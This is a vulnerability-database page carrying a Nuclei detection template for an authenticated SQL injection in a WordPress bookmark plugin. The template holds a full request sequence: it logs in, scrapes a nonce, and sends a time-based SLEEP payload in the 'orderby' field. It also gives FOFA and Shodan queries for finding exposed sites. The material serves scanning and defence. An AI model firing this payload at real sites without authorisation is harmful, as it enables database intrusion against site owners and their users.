Lucene search
K

WordPress CBX Bookmark & Favorite Plugin <= 2.0.4 - SQL Injection

🗓️ 05 Jul 2026 03:01:21Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 13 Views

SQL injection in CBX Bookmark & Favorite Plugin <= 2.0.4 enables subscriber access.

Related
Refs
Code
id: CVE-2025-13652

info:
  name: WordPress CBX Bookmark & Favorite Plugin <= 2.0.4 - SQL Injection
  author: neosmith1
  severity: critical
  description: |
    CBX Bookmark & Favorite WordPress plugin <= 2.0.4 contains a SQL injection caused by insufficient escaping of the 'orderby' parameter, letting authenticated attackers with Subscriber-level access extract sensitive database information
  impact: |
    Authenticated attackers can extract sensitive database information, potentially compromising user data confidentiality.
  remediation: |
   Update to a version later than 2.0.4 or the latest available version.
  reference:
    - https://nvd.nist.gov/vuln/detail/CVE-2025-13652
    - https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/cbxwpbookmark/cbx-bookmark-favorite-204-authenticated-subscriber-sql-injection
    - https://plugins.trac.wordpress.org/changeset/3276203/cbxwpbookmark
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 9.1
    cve-id: CVE-2025-13652
    cwe-id: CWE-89
    epss-score: 0.01077
    epss-percentile: 0.6097
  metadata:
    verified: true
    max-request: 3
    vendor: codeboxr
    product: cbx-bookmark-favorite
    fofa-query: body="cbxwpbookmark"
    shodan-query: http.html:"cbxwpbookmark"
  tags: cve,cve2025,wp-plugin,sqli,wordpress,cbxwpbookmark,authenticated,wp

variables:
  username: "{{username}}"
  password: "{{password}}"

flow: http(1) && http(2) && http(3)

http:
  - raw:
      - |
        POST /wp-login.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded
        Cookie: wordpress_test_cookie=WP+Cookie+check

        log={{username}}&pwd={{password}}&wp-submit=Log+In&redirect_to=%2F&testcookie=1

    extractors:
      - type: regex
        name: wp_cookie
        group: 1
        regex:
          - '(wordpress_logged_in[^;\r\n]+)'
        part: header
        internal: true

    matchers:
      - type: dsl
        dsl:
          - status_code == 302
          - contains(header, "wordpress_logged_in")
        condition: and
        internal: true

  - raw:
      - |
        GET / HTTP/1.1
        Host: {{Hostname}}
        Cookie: {{wp_cookie}}

    extractors:
      - type: regex
        name: nonce
        group: 1
        regex:
          - 'var\s+cbxwpbookmark\s*=\s*\{[^}]*?"nonce"\s*:\s*"([a-z0-9]+)"'
        part: body
        internal: true

    matchers:
      - type: dsl
        dsl:
          - status_code == 200
          - contains(body, "cbxwpbookmark")
          - nonce != ""
        condition: and
        internal: true

  - raw:
      - |
        @timeout: 30s
        POST /wp-admin/admin-ajax.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded
        Cookie: {{wp_cookie}}

        action=cbx_bookmark_loadmore&security={{nonce}}&limit=10&offset=0&userid=1&orderby=(SELECT+1+FROM+(SELECT+SLEEP(6))x)&order=DESC

    matchers:
      - type: dsl
        dsl:
          - duration >= 6
          - status_code == 200
        condition: and
# digest: 490a0046304402201183fe6e8725b1d82032e686f8a26a1e4ebf079e66783e4ea3ccce811b97f015022038b671bcada455b851bab370f2a9afe8cbbd5ed40611d51b41af98fba7180b1c:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

10 Apr 2026 04:18Current
6Medium risk
Vulners AI Score6
CVSS 3.16.5
EPSS0.01077
SSVC
13